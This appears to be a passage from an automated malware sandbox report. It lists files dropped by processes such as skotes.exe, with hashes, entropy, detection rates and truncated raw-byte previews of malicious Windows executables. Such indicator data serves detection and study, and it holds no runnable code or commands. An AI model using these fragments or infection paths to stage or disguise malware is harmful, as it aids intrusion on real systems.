                                                                                                                                                                                                                              SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1374720
                                                                                                                                                                                                                              Entropy (8bit):7.0671827674657335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
                                                                                                                                                                                                                              MD5:669ED3665495A4A52029FF680EC8EBA9
                                                                                                                                                                                                                              SHA1:7785E285365A141E307931CA4C4EF00B7ECC8986
                                                                                                                                                                                                                              SHA-256:2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
                                                                                                                                                                                                                              SHA-512:BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4471808
                                                                                                                                                                                                                              Entropy (8bit):7.986737809414949
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:7j9CAb4Juu5XcCCvf1it7R0E395jinPEQIYocTbc7M/f5iBGLf0I:7JCAb42Cg0t7fUPzj5iBosI
                                                                                                                                                                                                                              MD5:6D3D9DB92D0303C635E5EE37927AF3D0
                                                                                                                                                                                                                              SHA1:2503576F28631D418C634A20EE4DEBAD8B93CF40
                                                                                                                                                                                                                              SHA-256:8B09CD26504C9B2E50C6A82A63CD41F25EF88B5D144708EBD444FEF16721F4E4
                                                                                                                                                                                                                              SHA-512:249A3F1FC17AB61B9E90E985AC292CEABB80AB8DDD360B9231E125C88816A8672397C56DD03D935D81DC748296C93F3BC99BB8C45B1A816084726839954C9EAA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................{D...@... ............................._.r.s.....r.....................|...............................,....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..9...r......H(.............@...hdwdyvma............J(.............@...sgdtbgtm..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):968704
                                                                                                                                                                                                                              Entropy (8bit):6.699085607109417
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:OqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga7lk0:OqDEvCTbMWu7rQYlBQcBiT6rprG8aJL
                                                                                                                                                                                                                              MD5:FB1BFBB2B0FA71F93BEFD137BECD031B
                                                                                                                                                                                                                              SHA1:067E74E608761765408F511DB0EA7927AD898D9A
                                                                                                                                                                                                                              SHA-256:D8B3EC82006B92576468332476E7A0D0AB6666780169BBDCCD3523CD04702B18
                                                                                                                                                                                                                              SHA-512:8FF15CD4D17F3AE176D664E1691F328F2571218038213573DA62C1DF99D9F127850008B833F45DC924B4B2CB9B9752115809500270E02060FD4DE4B82C172D06
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.../.fg..........".................w.............@.......................... .......*....@...@.......@.....................d...|....@...\.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....\...@...^..................@..@.reloc...u.......v...R..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):97296
                                                                                                                                                                                                                              Entropy (8bit):7.9982317718947025
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                                                                                                                                                                              MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                                                                                                                                                                              SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                                                                                                                                                                              SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                                                                                                                                                                              SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4438776
                                                                                                                                                                                                                              Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1831936
                                                                                                                                                                                                                              Entropy (8bit):7.947651280489633
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:PfsZ4UgTVsUOU0YDYV7goy1ERSTn73kctxI:PfoTgZHOUeVFyG2jkcTI
                                                                                                                                                                                                                              MD5:C20D4E11E1046A5665D427BB4F6DE39E
                                                                                                                                                                                                                              SHA1:7DE8606D46B0B756D63D6ADC2D906B8752CDA9A5
                                                                                                                                                                                                                              SHA-256:486D1F0393573819C605E951CF677FBE4F7176B0313467F2E1716077F56C36C1
                                                                                                                                                                                                                              SHA-512:DF671D80E8D17B502208C1BDE7DDBF13D51BCC99F314ECAFB21086C7FC8F3B70F9CA5C6B8B23721CB77DA3171D0C68C59BC7F032D79DA1F1EE53F5F1F5598FBD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`H...........@...........................H...../.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ztykcjub.p.......p...^..............@...rrqhotlr.....PH.....................@....taggant.0...`H.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):776832
                                                                                                                                                                                                                              Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                              MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                              SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                              SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                              SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4472832
                                                                                                                                                                                                                              Entropy (8bit):7.9831324854567525
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:0AxwVsVZfgzsP1cbHf1EPVqiWzt7+upuJl184hMfyQmEhGR6NOBUDi:0ASgfgg19MiW8GuJl1wyO7rG
                                                                                                                                                                                                                              MD5:AF683C74F40C689194ACC25F6A9DFFEC
                                                                                                                                                                                                                              SHA1:B3F7FD19A91ED79DCBEFB82FF38D644301287BC0
                                                                                                                                                                                                                              SHA-256:ED7428FF275BAF08AD7E20DB9F514302495927A744613ABDB77AEED0A0ADD3C9
                                                                                                                                                                                                                              SHA-512:BC5058BCA0FEEDDC41DD798257991F7788CE183489AD11EEF9E008C0DA4A2B78BDEECF4BED86571A20ECFD23C41E7F87CAD577CCCAD804F36DBB5C5C309C852F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@.................................n.D...@... ............................._pt.s....`t.....................$E...............................D...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... ..9...t......`(.............@...odlbdsvw.............b(.............@...ivvnrpag.....P........D.............@....taggant.0...`..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1502720
                                                                                                                                                                                                                              Entropy (8bit):7.646111739368707
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                                                                                                                                                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                                                                                                                                                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                                                                                                                                                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                                                                                                                                                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NlllulY1z:NllU
                                                                                                                                                                                                                              MD5:15DE8A418257BAFE9A8497597CEC81D6
                                                                                                                                                                                                                              SHA1:66DC5A394584B8B24B91D60FC438624E311FEED9
                                                                                                                                                                                                                              SHA-256:36D792AEBDA7E7689763619E4979CA477DAC40B5B6222F41159DA5BCED20476B
                                                                                                                                                                                                                              SHA-512:FC7229A3A7E7E600569BA7F0F0A9F3D4A6E0FC7A7404CD9C45C28E7457F712C7946CF84A39CC74525394AF75399E2F307E9F34890D1F01063FBC6AE07213A73A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:@...e...................................,............@..........
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):612
                                                                                                                                                                                                                              Entropy (8bit):4.903167881740855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:hYNp/qwNFDvNbJw4xxaboR1XKCf0ktEjo+Y/lNQd40UlNRVxWU+oQL:hYNpnjbJwtsvXD05oP/l8tUlj7W7
                                                                                                                                                                                                                              MD5:E3EB0A1DF437F3F97A64ACA5952C8EA0
                                                                                                                                                                                                                              SHA1:7DD71AFCFB14E105E80B0C0D7FCE370A28A41F0A
                                                                                                                                                                                                                              SHA-256:38FFD4972AE513A0C79A8BE4573403EDCD709F0F572105362B08FF50CF6DE521
                                                                                                                                                                                                                              SHA-512:43573B0CBAAC6E2E1646E6217D2D10C40AD10B9DB1F4492D6740545E793C891B5E39283A082896C0392B88EB319DFA9392421B1C89C094C9CE9F31B53D37EBAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<head>.<title>Welcome to nginx!</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<h1>Welcome to nginx!</h1>.<p>If you see this page, the nginx web server is successfully installed and.working. Further configuration is required.</p>..<p>For online documentation and support please refer to.<a href="http://nginx.org/">nginx.org</a>.<br/>.Commercial support is available at.<a href="http://nginx.com/">nginx.com</a>.</p>..<p><em>Thank you for using nginx.</em></p>.</body>.</html>.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4438776
                                                                                                                                                                                                                              Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                                              Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                              MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                              SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                              SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                              SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4471808
                                                                                                                                                                                                                              Entropy (8bit):7.986737809414949
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:7j9CAb4Juu5XcCCvf1it7R0E395jinPEQIYocTbc7M/f5iBGLf0I:7JCAb42Cg0t7fUPzj5iBosI
                                                                                                                                                                                                                              MD5:6D3D9DB92D0303C635E5EE37927AF3D0
                                                                                                                                                                                                                              SHA1:2503576F28631D418C634A20EE4DEBAD8B93CF40
                                                                                                                                                                                                                              SHA-256:8B09CD26504C9B2E50C6A82A63CD41F25EF88B5D144708EBD444FEF16721F4E4
                                                                                                                                                                                                                              SHA-512:249A3F1FC17AB61B9E90E985AC292CEABB80AB8DDD360B9231E125C88816A8672397C56DD03D935D81DC748296C93F3BC99BB8C45B1A816084726839954C9EAA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................{D...@... ............................._.r.s.....r.....................|...............................,....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..9...r......H(.............@...hdwdyvma............J(.............@...sgdtbgtm..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1881088
                                                                                                                                                                                                                              Entropy (8bit):7.936505097294003
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:/1nIgasOJRRBXvNgwKNFKcMhO2ow+GrmlLq8:/lLasOJhXFgZB1w+GrE
                                                                                                                                                                                                                              MD5:8A1AE39FD06F240834EE7731E4470D2F
                                                                                                                                                                                                                              SHA1:CECA8F3CA15649D9109DD3CDB5BF990478606FBA
                                                                                                                                                                                                                              SHA-256:AD388620D15362F0DBD39DC6FFD7E8622155D79D36061E6EE0159158DF0A4AD8
                                                                                                                                                                                                                              SHA-512:FE9D0DB82058F55FABE9281E02435603C33AF38C9FAD5A0A6B2289AD0883D251D20CD7649AC8A97FDEE30994AA77A97D69E30D7BBD3EA4080160E2504ECBCD51
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                                              Reputation:unknown
